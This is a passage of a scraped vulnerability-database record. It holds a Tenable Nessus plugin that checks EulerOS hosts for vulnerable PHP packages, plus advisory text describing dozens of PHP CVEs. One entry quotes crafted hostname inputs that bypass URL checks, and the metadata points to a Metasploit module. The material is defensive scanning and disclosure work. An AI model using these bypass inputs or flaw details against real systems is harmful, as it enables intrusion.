fix for\n CVE-2018-5712.(CVE-2018-10547)\n\n - The Apache2 component in PHP before 5.6.38, 7.0.x\n before 7.0.32, 7.1.x before 7.1.22, and 7.2.x before\n 7.2.10 allows XSS via the body of a 'Transfer-Encoding:\n chunked' request, because the bucket brigade is\n mishandled in the php_handler function in\n sapi/apache2handler/sapi_apache2.c.(CVE-2018-17082)\n\n - PHP through 7.1.11 enables potential SSRF in\n applications that accept an fsockopen or pfsockopen\n hostname argument with an expectation that the port\n number is constrained. Because a :port syntax is\n recognized, fsockopen will use the port number that is\n specified in the hostname argument, instead of the port\n number in the second argument of the\n function.(CVE-2017-7272 )\n\n - In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x\n before 7.1.7, a stack-based buffer overflow in the\n zend_ini_do_op() function in Zend/zend_ini_parser.c\n could cause a denial of service or potentially allow\n executing code. NOTE: this is only relevant for PHP\n applications that accept untrusted input (instead of\n the system's php.ini file) for the parse_ini_string or\n parse_ini_file function, e.g., a web application for\n syntax validation of php.ini\n directives.(CVE-2017-11628)\n\n - In PHP before 5.6.30 and 7.x before 7.0.15, the PHAR\n archive handler could be used by attackers supplying\n malicious archive files to crash the PHP interpreter or\n potentially disclose information due to a buffer\n over-read in the phar_parse_pharfile function in\n ext/phar/phar.c.(CVE-2017-11147)\n\n - In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x\n before 7.1.7, the openssl extension PEM sealing code\n did not check the return value of the OpenSSL sealing\n function, which could lead to a crash of the PHP\n interpreter, related to an interpretation conflict for\n a negative number in ext/openssl/openssl.c, and an\n OpenSSL documentation omission.(CVE-2017-11144)\n\n - The locale_accept_from_http function in\n ext/intl/locale/locale_methods.c in PHP before 5.5.38,\n 5.6.x before 5.6.24, and 7.x before 7.0.9 does not\n properly restrict calls to the ICU\n uloc_acceptLanguageFromHTTP function, which allows\n remote attackers to cause a denial of service\n (out-of-bounds read) or possibly have unspecified other\n impact via a call with a long argument.(CVE-2016-6294)\n\n - Session fixation vulnerability in the Sessions\n subsystem in PHP before 5.5.2 allows remote attackers\n to hijack web sessions by specifying a session\n ID.(CVE-2011-4718)\n\n - Off-by-one error in the phar_parse_zipfile function in\n ext/phar/zip.c in PHP before 5.5.30 and 5.6.x before\n 5.6.14 allows remote attackers to cause a denial of\n service (uninitialized pointer dereference and\n application crash) by including the / filename in a\n .zip PHAR archive.(CVE-2015-7804)\n\n - The php_wddx_push_element function in ext/wddx/wddx.c\n in PHP before 5.6.26 and 7.x before 7.0.11 allows\n remote attackers to cause a denial of service (invalid\n pointer access and out-of-bounds read) or possibly have\n unspecified other impact via an incorrect boolean\n element in a wddxPacket XML document, leading to\n mishandling in a wddx_deserialize call.(CVE-2016-7418)\n\n - The exif_process_user_comment function in\n ext/exif/exif.c in PHP before 5.5.38, 5.6.x before\n 5.6.24, and 7.x before 7.0.9 allows remote attackers to\n cause a denial of service (NULL pointer dereference and\n application crash) via a crafted JPEG\n image.(CVE-2016-6292)\n\n - The make_http_soap_request function in\n ext/soap/php_http.c in PHP before 5.4.44, 5.5.x before\n 5.5.28, 5.6.x before 5.6.12, and 7.x before 7.0.4\n allows remote attackers to obtain sensitive information\n from process memory or cause a denial of service (type\n confusion and application crash) via crafted serialized\n _cookies data, related to the SoapClient::__call method\n in ext/soap/soap.c.(CVE-2016-3185)\n\n - Directory traversal vulnerability in the\n ZipArchive::extractTo function in ext/zip/php_zip.c in\n PHP before 5.4.45, 5.5.x before 5.5.29, and 5.6.x\n before 5.6.13 and ext/zip/ext_zip.cpp in HHVM before\n 3.12.1 allows remote attackers to create arbitrary\n empty directories via a crafted ZIP\n archive.(CVE-2014-9767)\n\n - The phar_convert_to_other function in\n ext/phar/phar_object.c in PHP before 5.4.43, 5.5.x\n before 5.5.27, and 5.6.x before 5.6.11 does not\n validate a file pointer before a close operation, which\n allows remote attackers to cause a denial of service\n (segmentation fault) or possibly have unspecified other\n impact via a crafted TAR archive that is mishandled in\n a Phar::convertToData call.(CVE-2015-5589)\n\n - Directory traversal vulnerability in the PharData class\n in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x\n before 5.6.12 allows remote attackers to write to\n arbitrary files via a .. (dot dot) in a ZIP archive\n entry that is mishandled during an extractTo\n call.(CVE-2015-6833)\n\n - The phar_get_entry_data function in ext/phar/util.c in\n PHP before 5.5.30 and 5.6.x before 5.6.14 allows remote\n attackers to cause a denial of service (NULL pointer\n dereference and application crash) via a .phar file\n with a crafted TAR archive entry in which the Link\n indicator references a file that does not\n exist.(CVE-2015-7803)\n\n - Stack consumption vulnerability in GD in PHP before\n 5.6.12 allows remote attackers to cause a denial of\n service via a crafted imagefilltoborder\n call.(CVE-2015-8874)\n\n - Stack-based buffer overflow in ext/phar/tar.c in PHP\n before 5.5.32, 5.6.x before 5.6.18, and 7.x before\n 7.0.3 allows remote attackers to cause a denial of\n service (application crash) or possibly have\n unspecified other impact via a crafted TAR\n archive.(CVE-2016-2554)\n\n - The phar_parse_zipfile function in zip.c in the PHAR\n extension in PHP before 5.5.33 and 5.6.x before 5.6.19\n allows remote attackers to obtain sensitive information\n from process memory or cause a denial of service\n (out-of-bounds read and application crash) by placing a\n PK\\x05\\x06 signature at an invalid\n location.(CVE-2016-3142)\n\n - ext/session/session.c in PHP before 5.6.25 and 7.x\n before 7.0.10 skips invalid session names in a way that\n triggers incorrect parsing, which allows remote\n attackers to inject arbitrary-type session data by\n leveraging control of a session name, as demonstrated\n by object injection.(CVE-2016-7125)\n\n - The exif_process_IFD_in_TIFF function in\n ext/exif/exif.c in PHP before 5.6.25 and 7.x before\n 7.0.10 mishandles the case of a thumbnail offset that\n exceeds the file size, which allows remote attackers to\n obtain sensitive information from process memory via a\n crafted TIFF image.(CVE-2016-7128)\n\n - The get_icu_disp_value_src_php function in\n ext/intl/locale/locale_methods.c in PHP before 5.3.29,\n 5.4.x before 5.4.30, and 5.5.x before 5.5.14 does not\n properly restrict calls to the ICU uresbund.cpp\n component, which allows remote attackers to cause a\n denial of service (buffer overflow) or possibly have\n unspecified other impact via a locale_get_display_name\n call with a long first argument.(CVE-2014-9912)\n\n - Use-after-free vulnerability in the SPL unserialize\n implementation in ext/spl/spl_array.c in PHP before\n 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12\n allows remote attackers to execute arbitrary code via\n crafted serialized data that triggers misuse of an\n array field.(CVE-2015-6832)\n\n - The make_http_soap_request function in\n ext/soap/php_http.c in PHP before 5.4.44, 5.5.x before\n 5.5.28, and 5.6.x before 5.6.12 does not properly\n retrieve keys, which allows remote attackers to cause a\n denial of service (NULL pointer dereference, type\n confusion, and application crash) or possibly execute\n arbitrary code via crafted serialized data representing\n a numerically indexed _cookies array, related to the\n SoapClient::__call method in\n ext/soap/soap.c.(CVE-2015-8835)\n\n - The uloc_acceptLanguageFromHTTP function in\n common/uloc.cpp in International Components for Unicode\n (ICU) through 57.1 for C/C++ does not ensure that there\n is a '\\0' character at the end of a certain temporary\n array, which allows remote attackers to cause a denial\n of service (out-of-bounds read) or possibly have\n unspecified other impact via a call with a long\n httpAcceptLanguage argument.(CVE-2016-6293)\n\n - When PHP EXIF extension is parsing EXIF information\n from an image, e.g. via exif_read_data() function, in\n PHP versions 7.1.x below 7.1.30, 7.2.x below 7.2.19 and\n 7.3.x below 7.3.6 it is possible to supply it with data\n what will cause it to read past the allocated buffer.\n This may lead to information disclosure or\n crash.(CVE-2019-11040)\n\n - When PHP EXIF extension is parsing EXIF information\n from an image, e.g. via exif_read_data() function, in\n PHP versions 7.1.x below 7.1.31, 7.2.x below 7.2.21 and\n 7.3.x below 7.3.8 it is possible to supply it with data\n what will cause it to read past the allocated buffer.\n This may lead to information disclosure or\n crash.(CVE-2019-11041)\n\n - When PHP EXIF extension is parsing EXIF information\n from an image, e.g. via exif_read_data() function, in\n PHP versions 7.1.x below 7.1.31, 7.2.x below 7.2.21 and\n 7.3.x below 7.3.8 it is possible to supply it with data\n what will cause it to read past the allocated buffer.\n This may lead to information disclosure or\n crash.(CVE-2019-11042)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2438\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?72902c09\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected php packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-2554\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2019-11043\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP-FPM Underflow RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"php-5.4.16-42.h63\",\n \"php-cli-5.4.16-42.h63\",\n \"php-common-5.4.16-42.h63\",\n \"php-gd-5.4.16-42.h63\",\n \"php-ldap-5.4.16-42.h63\",\n \"php-mysql-5.4.16-42.h63\",\n \"php-odbc-5.4.16-42.h63\",\n \"php-pdo-5.4.16-42.h63\",\n \"php-pgsql-5.4.16-42.h63\",\n \"php-process-5.4.16-42.h63\",\n \"php-recode-5.4.16-42.h63\",\n \"php-soap-5.4.16-42.h63\",\n \"php-xml-5.4.16-42.h63\",\n \"php-xmlrpc-5.4.16-42.h63\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-17T14:40:06", "description": "According to the versions of the php packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities :\n\n - When PHP EXIF extension is parsing EXIF information from an image, e.g. via exif_read_data() function, in PHP versions 7.1.x below 7.1.31, 7.2.x below 7.2.21 and 7.3.x below 7.3.8 it is possible to supply it with data what will cause it to read past the allocated buffer.\n This may lead to information disclosure or crash.(CVE-2019-11042)\n\n - When PHP EXIF extension is parsing EXIF information from an image, e.g. via exif_read_data() function, in PHP versions 7.1.x below 7.1.31, 7.2.x below 7.2.21 and 7.3.x below 7.3.8 it is possible to supply it with data what will cause it to read past the allocated buffer.\n This may lead to information disclosure or crash.(CVE-2019-11041)\n\n - An issue was discovered in PHP before 5.6.33, 7.0.x before 7.0.27, 7.1.x before 7.1.13, and 7.2.x before 7.2.1. There is Reflected XSS on the PHAR 404 error page via the URI of a request for a .phar file.(CVE-2018-5712)\n\n - gd_gif_in.c in the GD Graphics Library (aka libgd), as used in PHP before 5.6.33, 7.0.x before 7.0.27, 7.1.x before 7.1.13, and 7.2.x before 7.2.1, has an integer signedness error that leads to an infinite loop via a crafted GIF file, as demonstrated by a call to the imagecreatefromgif or imagecreatefromstring PHP function. This is related to GetCode_ and gdImageCreateFromGifCtx.(CVE-2018-5711)\n\n - The Apache2 component in PHP before 5.6.38, 7.0.x before 7.0.32, 7.1.x before 7.1.22, and 7.2.x before 7.2.10 allows XSS via the body of a 'Transfer-Encoding:\n chunked' request, because the bucket brigade is mishandled in the php_handler function in sapi/apache2handler/sapi_apache2.c.(CVE-2018-17082)\n\n - exif_process_IFD_in_MAKERNOTE in ext/exif/exif.c in PHP before 5.6.37, 7.0.x before 7.0.31, 7.1.x before 7.1.20, and 7.2.x before 7.2.8 allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a crafted JPEG file.(CVE-2018-14851)\n\n - An issue was discovered in ext/phar/phar_object.c in PHP before 5.6.36, 7.0.x before 7.0.30, 7.1.x before 7.1.17, and 7.2.x before 7.2.5. There is Reflected XSS on the PHAR 403 and 404 error pages via request data of a request for a .phar file. NOTE: this vulnerability exists because of an incomplete fix for CVE-2018-5712.(CVE-2018-10547)\n\n - An issue was discovered in PHP before 5.6.35, 7.0.x before 7.0.29, 7.1.x before 7.1.16, and 7.2.x before 7.2.4. Dumpable FPM child processes allow bypassing opcache access controls because fpm_unix.c makes a PR_SET_DUMPABLE prctl call, allowing one user (in a multiuser environment) to obtain sensitive information from the process memory of a second user's PHP applications by running gcore on the PID of the PHP-FPM worker process.(CVE-2018-10545)\n\n - In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x before 7.1.7, a stack-based buffer overflow in the zend_ini_do_op() function in Zend/zend_ini_parser.c could cause a denial of service or potentially allow executing code. NOTE: this is only relevant for PHP applications that accept untrusted input (instead of the system's php.ini file) for the parse_ini_string or parse_ini_file function, e.g., a web application for syntax validation of php.ini directives.(CVE-2017-11628)\n\n - The php_wddx_push_element function in ext/wddx/wddx.c in PHP before 5.6.26 and 7.x before 7.0.11 allows remote attackers to cause a denial of service (invalid pointer access and out-of-bounds read) or possibly have unspecified other impact via an incorrect boolean element in a wddxPacket XML document, leading to mishandling in a wddx_deserialize call.(CVE-2016-7418)\n\n - The exif_process_IFD_in_TIFF function in ext/exif/exif.c in PHP before 5.6.25 and 7.x before 7.0.10 mishandles the case of a thumbnail offset that exceeds the file size, which allows remote attackers to obtain sensitive information from process memory via a crafted TIFF image.(CVE-2016-7128)\n\n - ext/session/session.c in PHP before 5.6.25 and 7.x before 7.0.10 skips invalid session names in a way that triggers incorrect parsing, which allows remote attackers to inject arbitrary-type session data by leveraging control of a session name, as demonstrated by object injection.(CVE-2016-7125)\n\n - The locale_accept_from_http function in ext/intl/locale/locale_methods.c in PHP before 5.5.38, 5.6.x before 5.6.24, and 7.x before 7.0.9 does not properly restrict calls to the ICU uloc_acceptLanguageFromHTTP function, which allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via a call with a long argument.(CVE-2016-6294)\n\n - The exif_process_user_comment function in ext/exif/exif.c in PHP before 5.5.38, 5.6.x before 5.6.24, and 7.x before 7.0.9 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted JPEG image.(CVE-2016-6292)\n\n - The exif_process_IFD_in_MAKERNOTE function in ext/exif/exif.c in PHP before 5.5.38, 5.6.x before 5.6.24, and 7.x before 7.0.9 allows remote attackers to cause a denial of service (out-of-bounds array access and memory corruption), obtain sensitive information from process memory, or possibly have unspecified other impact via a crafted JPEG image.(CVE-2016-6291)\n\n - The php_url_parse_ex function in ext/standard/url.c in PHP before 5.5.38 allows remote attackers to cause a denial of service (buffer over-read) or possibly have unspecified other impact via vectors involving the smart_str data type.(CVE-2016-6288)\n\n - Integer overflow in the phar_parse_pharfile function in ext/phar/phar.c in PHP before 5.6.30 and 7.0.x before 7.0.15 allows remote attackers to cause a denial of service (memory consumption or application crash) via a truncated manifest entry in a PHAR archive.(CVE-2016-10159)\n\n - It was found that the exif_convert_any_to_int() function in PHP was vulnerable to floating point exceptions when parsing tags in image files. A remote attacker with the ability to upload a malicious image could crash PHP, causing a Denial of Service.(CVE-2016-10158)\n\n - Stack consumption vulnerability in GD in PHP before 5.6.12 allows remote attackers to cause a denial of service via a crafted imagefilltoborder call.(CVE-2015-8874)\n\n - ext/libxml/libxml.c in PHP before 5.5.22 and 5.6.x before 5.6.6, when PHP-FPM is used, does not isolate each thread from libxml_disable_entity_loader changes in other threads, which allows remote attackers to conduct XML External Entity (XXE) and XML Entity Expansion (XEE) attacks via a crafted XML document, a related issue to CVE-2015-5161.(CVE-2015-8866)\n\n - A flaw was found in the way the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened.(CVE-2015-7804)\n\n - A flaw was found in the way the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened.(CVE-2015-7803)\n\n - Use-after-free vulnerability in the spl_ptr_heap_insert function in ext/spl/spl_heap.c in PHP before 5.5.27 and 5.6.x before 5.6.11 allows remote attackers to execute arbitrary code by triggering a failed SplMinHeap::compare operation.(CVE-2015-4116)\n\n - The get_icu_disp_value_src_php function in ext/intl/locale/locale_methods.c in PHP before 5.3.29, 5.4.x before 5.4.30, and 5.5.x before 5.5.14 does not properly restrict calls to the ICU uresbund.cpp component, which allows remote attackers to cause a denial of service (buffer overflow) or possibly have unspecified other impact via a locale_get_display_name call with a long first argument.(CVE-2014-9912)\n\n - The header() PHP function allowed header stings containing line break followed by a space or tab, as allowed by RFC 2616. Certain browsers handled the continuation line as new header, making it possible to conduct a HTTP response splitting attack against such browsers. The header() function was updated to follow RFC 7230 and not allow any line breaks.(CVE-2015-8935)\n\n - The openssl_random_pseudo_bytes function in ext/openssl/openssl.c in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12 incorrectly relies on the deprecated RAND_pseudo_bytes function, which makes it easier for remote attackers to defeat cryptographic protection mechanisms via unspecified vectors.(CVE-2015-8867)\n\n - A flaw was found in the way the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened.(CVE-2015-6833)\n\n - A flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.(CVE-2015-6832)\n\n - Directory traversal vulnerability in the ZipArchive::extractTo function in ext/zip/php_zip.c in PHP before 5.4.45, 5.5.x before 5.5.29, and 5.6.x before 5.6.13 and ext/zip/ext_zip.cpp in HHVM before 3.12.1 allows remote attackers to create arbitrary empty directories via a crafted ZIP archive.(CVE-2014-9767)\n\n - In PHP before 5.6.31, an invalid free in the WDDX deserialization of boolean parameters could be used by attackers able to inject XML for deserialization to crash the PHP interpreter, related to an invalid free for an empty boolean element in ext/wddx/wddx.c.(CVE-2017-11143)\n\n - The php_wddx_push_element function in ext/wddx/wddx.c in PHP before 5.6.29 and 7.x before 7.0.14 allows remote attackers to cause a denial of service (out-of-bounds read and memory corruption) or possibly have unspecified other impact via an empty boolean element in a wddxPacket XML document.(CVE-2016-9935)\n\n - ext/wddx/wddx.c in PHP before 5.6.28 and 7.x before 7.0.13 allows remote attackers to cause a denial of service (NULL pointer dereference) via crafted serialized data in a wddxPacket XML document, as demonstrated by a PDORow string.(CVE-2016-9934)\n\n - The ZIP signature-verification feature in PHP before 5.6.26 and 7.x before 7.0.11 does not ensure that the uncompressed_filesize field is large enough, which allows remote attackers to cause a denial of service (out-of-bounds memory access) or possibly have unspecified other impact via a crafted PHAR archive, related to ext/phar/util.c and ext/phar/zip.c.(CVE-2016-7414)\n\n - Integer overflow in the php_html_entities function in ext/standard/html.c in PHP before 5.5.36 and 5.6.x before 5.6.22 allows remote attackers to cause a denial of service or possibly have unspecified other impact by triggering a large output string from the htmlspecialchars function.(CVE-2016-5094)\n\n - The get_icu_value_internal function in ext/intl/locale/locale_methods.c in PHP before 5.5.36, 5.6.x before 5.6.22, and 7.x before 7.0.7 does not ensure the presence of a '\\\\0' character, which allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via a crafted locale_get_primary_language call.(CVE-2016-5093)\n\n - The exif_process_IFD_TAG function in ext/exif/exif.c in PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6 does not properly construct spprintf arguments, which allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via crafted header data.(CVE-2016-4542)\n\n - The grapheme_stripos function in ext/intl/grapheme/grapheme_string.c in PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6 allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via a negative offset.(CVE-2016-4540)\n\n - The xml_parse_into_struct function in ext/xml/xml.c in PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6 allows remote attackers to cause a denial of service (buffer under-read and segmentation fault) or possibly have unspecified other impact via crafted XML data in the second argument, leading to a parser level of zero.(CVE-2016-4539)\n\n - ** DISPUTED ** Integer overflow in the php_raw_url_encode function in ext/standard/url.c in PHP before 5.5.34, 5.6.x before 5.6.20, and 7.x before 7.0.5 allows remote attackers to cause a denial of service (application crash) via a long string to the rawurlencode function. NOTE: the vendor says 'Not sure if this qualifies as security issue (probably not).'(CVE-2016-4070)\n\n - The phar_parse_zipfile function in zip.c in the PHAR extension in PHP before 5.5.33 and 5.6.x before 5.6.19 allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read and application crash) by placing a PK\\\\x05\\\\x06 signature at an invalid location.(CVE-2016-3142)\n\n - Use-after-free vulnerability in wddx.c in the WDDX extension in PHP before 5.5.33 and 5.6.x before 5.6.19 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact by triggering a wddx_deserialize call on XML data containing a crafted var element.(CVE-2016-3141)\n\n - The odbc_bindcols function in ext/odbc/php_odbc.c in PHP before 5.6.12 mishandles driver behavior for SQL_WVARCHAR columns, which allows remote attackers to cause a denial of service (application crash) in opportunistic circumstances by leveraging use of the odbc_fetch_array function to access a certain type of Microsoft SQL Server table.(CVE-2015-8879)\n\n - In PHP before 5.6.30 and 7.x before 7.0.15, the PHAR archive handler could be used by attackers supplying malicious archive files to crash the PHP interpreter or potentially disclose information due to a buffer over-read in the phar_parse_pharfile function in ext/phar/phar.c.(CVE-2017-11147)\n\n - ext/standard/var_unserializer.c in PHP before 5.6.25 and 7.x before 7.0.10 mishandles certain invalid objects, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted serialized data that leads to a (1)\n __destruct call or (2) magic method call.(CVE-2016-7124)\n\n - Stack-based buffer overflow in ext/phar/tar.c in PHP before 5.5.32, 5.6.x before 5.6.18, and 7.x before 7.0.3 allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a crafted TAR archive.(CVE-2016-2554)\n\n - A flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.(CVE-2015-6831)\n\n - The make_http_soap_request function in ext/soap/php_http.c in PHP before 5.4.44, 5.5.x before 5.5.28, 5.6.x before 5.6.12, and 7.x before 7.0.4 allows remote attackers to obtain sensitive information from process memory or cause a denial of service (type confusion and application crash) via crafted serialized\n _cookies data, related to the SoapClient::__call method in ext/soap/soap.c.(CVE-2016-3185)\n\n - The object_common1 function in ext/standard/var_unserializer.c in PHP before 5.6.30, 7.0.x before 7.0.15, and 7.1.x before 7.1.1 allows remote attackers to cause a denial of service (buffer over-read and application crash) via crafted serialized data that is mishandled in a finish_nested_data call.(CVE-2016-10161)\n\n - The finish_nested_data function in ext/standard/var_unserializer.re in PHP before 5.6.31, 7.0.x before 7.0.21, and 7.1.x before 7.1.7 is prone to a buffer over-read while unserializing untrusted data.\n Exploitation of this issue can have an unspecified impact on the integrity of PHP.(CVE-2017-12933)\n\n - In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x before 7.1.7, the openssl extension PEM sealing code did not check the return value of the OpenSSL sealing function, which could lead to a crash of the PHP interpreter, related to an interpretation conflict for a negative number in ext/openssl/openssl.c, and an OpenSSL documentation omission.(CVE-2017-11144)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A heap out-of-bounds write or read occurs in next_state_val() during regular expression compilation. Octal numbers larger than 0xff are not handled correctly in fetch_token() and fetch_token_in_cc(). A malformed regular expression containing an octal number in the form of '\\700' would produce an invalid code point value larger than 0xff in next_state_val(), resulting in an out-of-bounds write memory corruption.(CVE-2017-9226)\n\n - In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 in certain configurations of FPM setup it is possible to cause FPM module to write past allocated buffers into the space reserved for FCGI protocol data, thus opening the possibility of remote code execution.(CVE-2019-11043)\n\n - Session fixation vulnerability in the Sessions subsystem in PHP before 5.5.2 allows remote attackers to hijack web sessions by specifying a session ID.(CVE-2011-4718)\n\n - In PHP before 5.6.32, 7.x before 7.0.25, and 7.1.x before 7.1.11, an error in the date extension's timelib_meridian handling of 'front of' and 'back of' directives could be used by attackers able to supply date strings to leak information from the interpreter, related to ext/date/lib/parse_date.c out-of-bounds reads affecting the php_parse_date function. NOTE: this is a different issue than CVE-2017-11145.(CVE-2017-16642)\n\n - In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x before 7.1.7, an error in the date extension's timelib_meridian parsing code could be used by attackers able to supply date strings to leak information from the interpreter, related to ext/date/lib/parse_date.c out-of-bounds reads affecting the php_parse_date function. NOTE: the correct fix is in the e8b7698f5ee757ce2c8bd10a192a491a498f891c commit, not the bd77ac90d3bdf31ce2a5251ad92e9e75 gist.(CVE-2017-11145)\n\n - In PHP before 5.6.28 and 7.x before 7.0.13, incorrect handling of various URI components in the URL parser could be used by attackers to bypass hostname-specific URL checks, as demonstrated by evil.example.com:80#@good.example.com/ and evil.example.com:80?@good.example.com/ inputs to the parse_url function (implemented in the php_url_parse_ex function in ext/standard/url.c).(CVE-2016-10397)\n\n - ext/mysqlnd/mysqlnd_wireprotocol.c in PHP before 5.6.26 and 7.x before 7.0.11 does not verify that a BIT field has the UNSIGNED_FLAG flag, which allows remote MySQL servers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact via crafted field metadata.(CVE-2016-7412)\n\n - Oniguruma through 6.9.3, as used in PHP 7.3.x and other products, has a heap-based buffer over-read in str_lower_case_match in regexec.c.(CVE-2019-19246)\n\n - When PHP EXIF extension is parsing EXIF information from an 